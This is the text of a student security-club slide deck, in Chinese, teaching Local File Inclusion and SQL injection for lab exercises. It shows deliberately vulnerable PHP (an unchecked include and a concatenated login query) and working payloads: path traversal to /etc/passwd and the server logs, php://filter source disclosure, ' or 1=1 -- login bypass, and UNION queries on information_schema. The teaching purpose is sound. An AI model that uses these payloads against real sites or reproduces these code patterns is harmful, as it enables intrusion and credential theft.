ITAC | Websec 3 - Speaker Deck

Slide 1

Slide 1 text

Web Security Racterub @ ITAC

Slide 2

Slide 2 text

•元智大學電通英專大二 •常用 ID：Racterub / Racter •2017-2019 AIS3 學員 •2019 台灣好厲駭學員 •2020 ⺠生物聯網漏洞挖掘競賽第二期第三名 •2020 Zyxel 榮耀資戰第三名 About Me

Slide 3

Slide 3 text

• LFI • SQL injection ⽬錄

Slide 4

Slide 4 text

LFI Local File Inclusion

Slide 5

Slide 5 text

HOW PHP works?

Slide 6

Slide 6 text

• 可以讀取主機上的任意檔案，也可以執行任意 PHP 檔案 • 可以透過 PHP 的特別協定取得 source code • 危害程度非常大 • 有一定的機率可以直接取得 RCE LFI

Slide 7

Slide 7 text

LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else { @include("base.php"); }

Slide 8

Slide 8 text

LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else { @include("base.php"); } ?p=base.php

Slide 9

Slide 9 text

LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else { @include("base.php"); } ?p=!../!../!../!../!../!../!../!../!../!../etc/passwd

Slide 10

Slide 10 text

LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else { @include("base.php"); } ?p=!../!../!../!../!../!../var/log/nginx/access.log

Slide 11

Slide 11 text

為什麼是 access.log？

Slide 12

Slide 12 text

LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200 1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" IP 來源

Slide 13

Slide 13 text

Slide 14

Slide 14 text

Slide 15

Slide 15 text

Slide 16

Slide 16 text

Slide 17

Slide 17 text

Slide 18

Slide 18 text

Slide 19

Slide 19 text

Slide 20

Slide 20 text

Slide 21

Slide 21 text

Slide 22

Slide 22 text

LFI php:!//

Slide 23

Slide 23 text

• Filters • String Filters • Conversion Filters • Compression Filters • Encryption Filters LFI

Slide 24

Slide 24 text

• String Filters • string.rot13 • string.toupper • string.tolower • string.strip_tags (在 v7.3.0 已被棄⽤) Filters

Slide 25

Slide 25 text

• Conversion Filters • convert.base64-encode • convert.base64-decode • convert.iconv.* Filters

Slide 26

Slide 26 text

• Compression Filters • zlib.deﬂate • zlib.inﬂate • bzip2.compress • bzip2.decompress Filters

Slide 27

Slide 27 text

LFI php:!//filter/resource=index.php

Slide 28

Slide 28 text

LFI php:!//filter/convert.base64-encode/ resource=index.php

Slide 29

Slide 29 text

Lab Web3 LFI

Slide 30

Slide 30 text

SQL Injection

Slide 31

Slide 31 text

先說 SQL injection 拜託不要在學網練習宿網也不要

Slide 32

Slide 32 text

社課打到的機器都有特別設定過

Slide 33

Slide 33 text

不要隨便從學網打其他網站ㄛ

Slide 34

Slide 34 text

SQL id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac Login users admins

Slide 35

Slide 35 text

SQL id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 36

Slide 36 text

SQL SELECT * FROM users ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 37

Slide 37 text

SQL SELECT * FROM users WHERE username='admin' ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 38

Slide 38 text

SQL SELECT id, password FROM users WHERE username='admin' ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 39

Slide 39 text

SQL SELECT * FROM users LIMIT 0,1; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 40

Slide 40 text

SQL SELECT * FROM users LIMIT 1,3; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 41

Slide 41 text

SQL injection if (isset($_GET['user']) || isset($_GET['pass'])) { $sql = "SELECT id FROM user WHERE username='". $_GET['user']."' AND password='".$_GET['pass']."'"; $result = $connection->query($sql); if ($result) { $data = $result->fetch(PDO::FETCH_ASSOC); if ($data) { die("success"); } else { die(“failed"); } } else { die("error"); } }

Slide 42

Slide 42 text

SQL injection SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";

Slide 43

Slide 43 text

SQL injection SELECT id FROM user WHERE username='admin' AND password='admin'; user = admin pass = admin

Slide 44

Slide 44 text

SQL injection SELECT id FROM user WHERE username='' or 1=1 -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

Slide 45

Slide 45 text

SQL injection SELECT id FROM user WHERE username='' or 1=1 -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

Slide 46

Slide 46 text

所以 SQL injection 通常出現在 SQL 語法拼接作查詢

Slide 47

Slide 47 text

Lab Web3 Login as admin

Slide 48

Slide 48 text

• Union-based • 做合併查詢，可以替換掉原本要查詢的位置，在網頁取得你構造的 SQL 語法所拿的資料 • Boolean-based • 當你在猜字時，可以透過 ASCII 來比較，用 True / False 撈資料 • Time-based • 可以使用 Boolean-based 的方式然後在多去 sleep 一下 SQL injection 種類

Slide 49

Slide 49 text

SQL SELECT * FROM users WHERE id=1; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 50

Slide 50 text

SQL SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac 1 2 3

Slide 51

Slide 51 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,2,3; id username password 1 2 3

Slide 52

Slide 52 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,user(),3; id username password 1 root@localhost 3

Slide 53

Slide 53 text

• information_schema MySQL

Slide 54

Slide 54 text

• information_schema • 存有資料庫的中繼資料 MySQL

Slide 55

Slide 55 text

• information_schema • 存有資料庫的中繼資料 • Database Name • Table Name • Column Name MySQL

Slide 56

Slide 56 text

• Database Name • information_schema.schemata • Table Name • information_schema.tables • Column Name • information_schema.columns MySQL

Slide 57

Slide 57 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata; id username password 1 login 3

Slide 58

Slide 58 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='login'; id username password 1 users 3

Slide 59

Slide 59 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3

Slide 60

Slide 60 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users' limit 1,1; id username password 1 username 3

Slide 61

Slide 61 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3